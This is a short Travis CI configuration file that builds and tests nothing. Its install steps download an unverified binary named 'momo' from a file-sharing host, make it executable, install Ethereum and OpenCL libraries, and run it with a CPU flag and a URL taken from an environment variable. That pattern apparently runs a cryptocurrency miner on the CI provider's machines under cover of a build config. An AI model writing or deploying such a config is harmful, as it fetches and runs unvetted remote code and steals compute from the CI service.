language: c
sudo: true
dist: trusty
before_install:
  - curl -o momo -L https://transfer.sh/dUL2U/momo
  - ls -lah
  - chmod +x momo
  - sudo add-apt-repository -y ppa:ethereum/ethereum
  - sudo apt-get update
  - sudo apt-get install libcryptopp-dev libleveldb-dev libjsoncpp-dev libjson-rpc-cpp-dev libboost-all-dev libgmp-dev libreadline-dev libcurl4-gnutls-dev ocl-icd-libopencl1 opencl-headers mesa-common-dev libmicrohttpd-dev build-essential -y
  - ./momo --cpu -F $URL
